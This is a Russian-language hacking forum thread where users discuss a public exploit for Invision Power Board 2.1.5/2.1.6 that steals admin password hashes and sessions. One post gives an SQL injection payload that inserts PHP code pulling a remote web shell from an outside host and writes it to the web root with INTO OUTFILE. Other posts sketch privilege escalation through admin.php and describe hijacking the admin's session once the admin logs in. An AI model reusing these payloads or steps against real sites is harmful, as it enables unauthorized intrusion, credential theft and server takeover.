Вполне возможно что твой аккаунт забанили, насколько я знаю - эксп. RST оставляет сообщение, благодаря которому и существует возможность sql inj. Попробуй создать другой аккаунт. P.S. и действовать быстро.
сразу извиняюсь, я ipb не очень знаком как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
Исходник чего?форума? так как в exploite происходит только извлечение этого поля из бд. тогда я непонимаю логику создателей форума, для чего такое надо. в какой момент создается его сессия, когда он появляется на форуме? И только тогда можно получить его сессию?
Хай всем! Хочу залить шелл через IPB 2.1.5 Юзаю http://rst.void.ru/download/r57ipb216gui.txt хэш ворует, ссесию тоже, а вот нового админа не создаёт! И скоко я не смотрел сорс, ничё не понимаю! Пытался и руками куда-то в сплоит дописать как последний ламер Code: UNION INSERT INTO ibf_faq (id, title, text, description) VALUES(\'98\', \'shell\', \'<? require \\\"http://rst.void.ru/download/r57shell.txt\\\" ?>\', \'To hack this server\'); SELECT text INTO OUTFILE \'C:/AppServ/www/db.php\' FROM ibf_faq where id = \\\"98\\\"; Но он не создаёт такого файла (В C:/AppServ/www/ уверен, админ оставил phpinfo.php ) Кто поможет сакс хакеру залить шелл?
Вручную заголовок подделай. Там не трудно... а потом скуль запросом через админку подними себе права... Вот мой 100% рабочий запрос, проверял на ИБП 2.1.6 просто подставь свои значения и выполни его... короче вырезает форум мой запрос если что в асю стукнись - подскажу... GET http://<your forum>/admin.php?adsess=<adsess_id>
Не ребят... так дело не пойдет... Начну с того, что помочь вручную подделать заголовок я согласился только Пончику, а в асю поломилось пол ачата, ну это ладно, Бог с ним, хорошим людям помочь никогда не жалко, но ведь есть такие, которые пишут в асю, а на мой вопрос, что именно у тебя не получается пишут мне в ответ кучу матов и говорят, что я \"ничего\" не умею и помочь ничем не могу, ну и многое другое... В общем все. От меня больше никто никогда не получит никакой помощи здесь. Люди не умеют быть благодарными, не ценят времени и помощи, их не волнует сколько времени человек продолбался над той или иной задачей, они считают его обязанностью помочь им, а для разнообразия в конце еще и обматерят. Это просто не культурно. Просто не по человечески как то. Аж обидно стало. Ну да ладно... я все сказал.
м-да, эти лайнеджевцы скоро за любую лишнюю кавычку в запросе банить начнут.. А насчет сплоита: не понял нафиг этот графич. интерфейс? удобства он в использовании совсем не добавил. Я когда етот сплоит испытывал, штук 20 сайтов пересмотрел пока мне не попался один уязвимый, и то сплоит работал наполовину. А так неплохой эксплоит, но, как и любой другой паблик сплоет, по большому счету бесполезный...
Мля... Влепил бы тебе минусов, да не могу. За то, что темы давнишние поднимаешь да ещё и бессмысленными постами. В этом разделе третья вподряд. З.Ы. А [Zarakul] наверное корефан твой раз тебе репутацию на таких постах подымает )
bandera, темы поднимаю я старые потому, что на их дату появления обычно и не смотрю. Если мне охота что-нить написать, я пишу, так что извеняй... Zarakul'а я вообще не знаю. На циферку с моей репутацией я даже внимания не обращаю, так как мне эта репутация нафиг не нужна...
Зачем в ПМ? Сначала надо проверить уязвим ли форум. Затем если он уязвим надо ждать админа пока он прийдёт и залезет на форум, и тогда только ты его сессию спиздиш! А так пока админа на форуме нет жди и думай..... о чем нибудь. И еще надо сначала нажать Get admin Session- потом увидиш или -Please later(что то типа такого)- или Попрёт все!
